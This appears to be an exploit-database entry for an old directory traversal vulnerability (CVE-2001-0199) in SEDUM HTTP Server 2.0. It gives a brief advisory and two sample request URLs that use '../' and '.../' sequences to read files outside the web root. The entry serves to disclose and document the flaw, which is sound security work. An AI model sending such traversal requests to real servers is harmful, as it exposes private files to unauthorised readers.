[] NeoSense

Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal

Author: Joe Testa
type: remote
platform: windows
port: 
date_added: 2001-02-04 
date_updated: 2012-08-18 
verified: 1 
codes: CVE-2001-0199;OSVDB-14797 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2335/info

A remote user could gain read access to known files outside of the root directory in a SEDUM HTTP Server. Requesting a specially crafted URL composed of '../' or '.../' sequences will disclose the requested file.

http://target/../[file outside web root]

http://target/.../[file outside web root]